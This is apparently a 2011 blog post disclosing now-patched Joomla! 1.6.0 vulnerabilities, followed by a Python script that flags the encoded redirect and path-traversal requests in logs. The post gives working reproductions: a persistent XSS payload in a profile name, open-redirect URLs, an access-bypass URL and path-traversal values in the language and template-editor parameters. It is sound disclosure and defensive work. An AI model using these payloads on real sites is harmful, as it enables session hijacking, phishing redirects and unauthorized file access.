Joomla! 1.6.0 Multiple Minor Vulnerabilities
Posted in Joomla!
2011-03-08 15:47:09 +0000 UTC
Now that 1.6.1 is officially released, I figured I'd go ahead and publish a few of the "sensitive" bugs I found in 1.6.0.
So without further ado...
Persistent XSS
http://developer.joomla.org/security/news/331-20110204-core-xss-vulnerabilities
- Log in as any user
- Edit profile
- Change name:
y"/style="position:absolute;top:0px;left:0px;width:99em;height:99em"/onmouseover="alert(1);//
- Save profile
- Wait for admin to visit administrator/index.php?option=com_users
Redirect
http://developer.joomla.org/security/news/333-20110302-core-redirect-vulnerabilities
The following URLs caused off-site redirects.
index.php?option=com_content&view=article&task=vote&id=-1&user_rating=999&url=http%3A%2f%2fjeffchannell.com
index.php?option=com_weblinks&task=weblink.add&return=aHR0cDovL2plZmZjaGFubmVsbC5jb20=
Information Disclosure
http://developer.joomla.org/security/news/334-20110303-core-information-disclosure
The following URL could be used to see articles regardless of user access level:
index.php?option=com_content&view=articles&layout=modal&tmpl=component
Information Disclosure
http://developer.joomla.org/security/news/332-20110301-core-information-disclosure
Saving of user profiles did not properly sanitize the 'language' parameter.
- Log in as any user
- visit index.php?option=com_users&view=profile
- click "Edit Profile"
- turn on Tamper Data
- submit form
- edit jform[params][language] and set to ../index.php%00
- submit data
* Failed loading XML file
* /var/www/jj/language/../index.php
* XML: ParsePI: PI php never end ...
* XML: Start tag expected, '<' not found
Unauthorized Access
http://developer.joomla.org/security/news/335-20110304-core-unauthorised-access
The following URL will allow authenticated users with permission to access the Template Manager to edit files outside the scope of the template:
administrator/index.php?option=com_templates&task=source.edit&id=NTAzOi4uLy4uL2luZGV4LnBocA==
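For defenders reviewing request logs, the base64-encoded parameters in the Redirect and Unauthorized Access sections hide the off-site URL and the ../ path until they are decoded. The following log-triage sketch is an added example, not part of the original post or of Joomla!; SITE_HOST and all function names are assumptions made for illustration.

```python
import base64
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "example.org"  # assumption: hostname of the site being monitored

def b64_text(value):
    """Decode a base64 query value to text; None if it is not valid base64/UTF-8."""
    value = value.replace(" ", "+")  # parse_qs turns '+' into a space
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
        return raw.decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def is_offsite(target):
    """True when the target names a host other than our own (also catches //host)."""
    host = urlsplit(target).hostname
    return host is not None and host != SITE_HOST

def has_traversal(path):
    """True when a path contains a '..' segment or a NUL byte."""
    return "\x00" in path or ".." in path.replace("\\", "/").split("/")

def classify(request_uri):
    """Return a list of findings for one request URI (path plus query string)."""
    qs = parse_qs(urlsplit(request_uri).query)
    findings = []
    for name in ("url", "return"):  # 'return' is base64-encoded, 'url' is not
        for raw in qs.get(name, []):
            target = raw if name == "url" else b64_text(raw)
            if target and is_offsite(target):
                findings.append(f"offsite-redirect:{name}={target}")
    if qs.get("task") == ["source.edit"]:
        for raw in qs.get("id", []):
            decoded = b64_text(raw) or ""
            # The page's sample id decodes to "<number>:<relative path>".
            if has_traversal(decoded.partition(":")[2]):
                findings.append(f"template-path-traversal:{decoded}")
    return findings

# First three URIs are from the page; the last two are constructed benign requests.
SAMPLES = [
    "index.php?option=com_content&view=article&task=vote&id=-1&user_rating=999&url=http%3A%2f%2fjeffchannell.com",
    "index.php?option=com_weblinks&task=weblink.add&return=aHR0cDovL2plZmZjaGFubmVsbC5jb20=",
    "administrator/index.php?option=com_templates&task=source.edit&id=NTAzOi4uLy4uL2luZGV4LnBocA==",
    "index.php?option=com_weblinks&task=weblink.add&return=aW5kZXgucGhw",
    "administrator/index.php?option=com_templates&task=source.edit&id=NTAzOmluZGV4LnBocA==",
]
if __name__ == "__main__":
    for uri in SAMPLES:
        print(classify(uri) or "ok", uri)
```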